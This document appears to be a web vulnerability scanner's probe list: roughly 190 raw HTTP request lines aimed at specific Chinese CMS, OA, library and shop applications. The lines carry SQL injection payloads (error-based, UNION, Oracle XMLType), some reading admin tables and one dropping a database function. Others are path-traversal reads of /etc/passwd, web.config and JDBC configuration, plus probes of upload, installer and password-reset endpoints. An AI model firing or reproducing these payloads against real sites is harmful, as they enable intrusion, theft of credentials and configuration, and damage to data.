GET /?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
POST /admin/uploadFile.action
GET /Adminiscentertrator/AdmIndex.asp
POST /Adminiscentertrator/AdmLinkInsert.asp
GET /corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /NewsList.asp
GET /bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
GET /zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
GET /prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
GET /prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
GET /truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
GET /bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/webissue.asp
GET /article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
GET /bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/nowwebissue.asp
GET /bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/prewebissue.asp
POST /epstar/servlet/RaqFileServer?action=save&fileName=test.txt
GET /epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
GET /www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
HEAD /body/Function/download.asp?filepath=../download.asp&filename=download
GET /news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
GET /install/step4.aspx
GET /admin/Role/Role_List.aspx
GET /sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
POST /admin/operupload.asp
POST /member/findAddressById.json
POST /member/zoneNm.json
GET /main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
HEAD /i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
GET /api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
POST /search.php
GET /opac/index.jsp?page=../web-inf/web.xml
HEAD /datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
GET /datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
GET /account.t?op=showAccountList
GET /oa_server/App_Pages/App_page/News_add.aspx
POST /truexxgk/app/YsqgkController/smallQuery?type=1
POST /truexxgk/app/YsqgkController/smallQuery?type=1
GET /store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /detail.asp?id=-306/**/And/**/1=char(106)--&&t=
GET /content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /UploadHandler.ashx
GET /index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
GET /class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
POST /admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
POST /post.php?act=phpok&id=12
POST /weixin/index.php?m=index&c=index
POST /work_flow/formOptJSPUpload.jsp?flag=1
POST /work_flow/formStartJSPUpload.jsp?flag=1
POST /admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
POST /public/editor/tpsc1.jsp?flag=sc
GET /outImg?imgPath=c:/boot.ini
GET /outImg?imgPath=/etc/passwd
POST /gsgl.asp?stype=
GET /common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /piw/Member/UploadMemberAttach.jsp
GET /piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
GET /piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
GET /piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
HEAD /cardload.jsp?filename=../etc/passwd&maininfo_id=-12
GET /systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
GET /show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
GET /FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
GET /Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
GET /news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
GET /OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
GET /Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
GET /wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
GET /answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
POST /member.php?act=updateinfo
POST /site56/LmsOrder/trackOrder.jspx
GET /house/ProcManage/WebHouse/HousePic.aspx
GET /CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
GET /CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
HEAD /_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
GET /FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
POST /loginverify.asp
POST /newssearch.cfm
GET /mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
GET /news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
HEAD /down.aspx?Url=../web.config
HEAD /showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
GET /sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
GET /opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
GET /getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
GET /getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
GET /MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
GET /install/install.php.lock?step=2
GET /cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
GET /getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
HEAD /web.config.file.aspx
GET /wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
POST /information/changeState.asp
POST /MessageList.asp?action=search
POST /bangong/GroupInforDo.asp
POST /bangong/ShortCutInforDo.asp
HEAD /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
GET /shownews.aspx?newsno=-1'%20and%201=char(106)%20--
GET /nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
POST /ratercp.php?action=savepassword
GET /admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
POST /admincp.php?action=constructionresults&todo=del
POST /admincp.php?action=declarepublish&todo=del
GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
GET /index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /index.php?action=search&todo=site
GET /index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
POST /include/upload.inc.php
POST /admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
POST /admincp.php?action=vote&todo=savevote
GET /admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
POST /admincp.php?action=/../teach/sitebook&id=1
GET /seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
GET /complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
GET /list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
POST /index_communicate.php
GET /file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
GET /pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
GET /pub/search/default.asp?id=-1/**/and/**/1=char(106)--
GET /pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
GET /index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
HEAD /DownLoad.aspx?mu=../&fn=web.config&newname=web.config
GET /faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
GET /NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
GET /WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
POST /pt/edu/stuTransfer.aspx
GET /NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
GET /news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
GET /news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
GET /allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /download2.aspx?fn=../web.config
HEAD /DownLoad.aspx?Accessory=../index.aspx
POST /mod/news/qianshoucount.php
POST /mod/card/quest.php?op=get_m
POST /mod/home/quest.php?op=get_group_list
GET /NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
GET /NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
GET /js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
HEAD /ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
GET /news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
GET /ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
GET /jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
POST /scrp/book.cfm?sKeyword=1&sFieldName=bname
GET /main/
GET /asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
GET /getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
GET /install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
GET /module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
GET /myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
POST /Logon?action=logon
GET /UserSecurityController.do?method=getPassword&step=2&userName=admin
GET /webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
HEAD /common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
GET /OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
GET /showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
POST /general/crm/apps/crm/include/import/export.php
GET /Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
GET /Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
HEAD /admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
GET /cms/conf/system.xml
POST /erp/reportmanage/taskreport/lljinduadd.aspx
POST /oa/erp/SalePlan/YearPlanAdd.aspx
GET /oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
GET /oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
GET /oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
HEAD /downTemp.aspx?type=downDb&fileName=../web.config
GET /showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
GET /showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
